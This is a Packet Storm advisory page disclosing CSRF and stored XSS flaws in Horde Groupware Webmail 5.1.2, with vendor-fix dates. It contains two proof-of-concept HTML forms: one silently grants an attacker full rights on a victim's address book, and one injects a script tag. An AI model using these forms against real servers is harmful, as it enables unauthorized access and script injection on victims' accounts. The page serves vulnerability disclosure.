Exploit the possiblities

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting
Posted Nov 4, 2013
Authored by Marcela Benetrix

Horde version 5.1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2013-6365, CVE-2013-6364
MD5 | 61a62e5a593fbb47e32c7273968288a7

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
#############################
Exploit Title : CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF Location

Change of permissions functionality was found to miss unique token in the form.


##########################
PoC
<html>

<body>
<form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
<input type="hidden" name="actionID" value="editform" />
<input type="hidden" name="cid" value="37" />
<input type="hidden" name="app" value="turba" />
<input type="hidden" name="owner_input" value="kenedyK" />
<input type="hidden"
name="u_names[||new_input]"
value="AttackerUserName" />
<input type="hidden"
name="u_read[||new_input]" value="on" />
<input type="hidden"
name="u_edit[||new_input]" value="on" />
<input type="hidden"
name="u_delete[||new_input]" value="on" />
<input type="hidden" name="g_names[||new]"
value="" />
<input type="hidden" name="save_and_finish"
value="Save and Finish" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Preconditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them, he can launch the attack.

###########################
CVE identifier

CVE-2013-6365.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
#############################




Exploit Title : XSS and CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF/XSS Location

Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks.

##########################
POC

<html>
<body>
<form action="http://www.victim.com/horde/turba/search.php"
method="POST">
<input type="hidden" name="source" value="" />
<input type="hidden" name="criteria" value="" />
<input type="hidden" name="val" value="" />
<input type="hidden" name="search" value="Search" />
<input type="hidden" name="save_vbook" value="on" />
<input type="hidden" name="vbook_name"
value="<script>alert(1)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


###########################
CVE identifier

CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close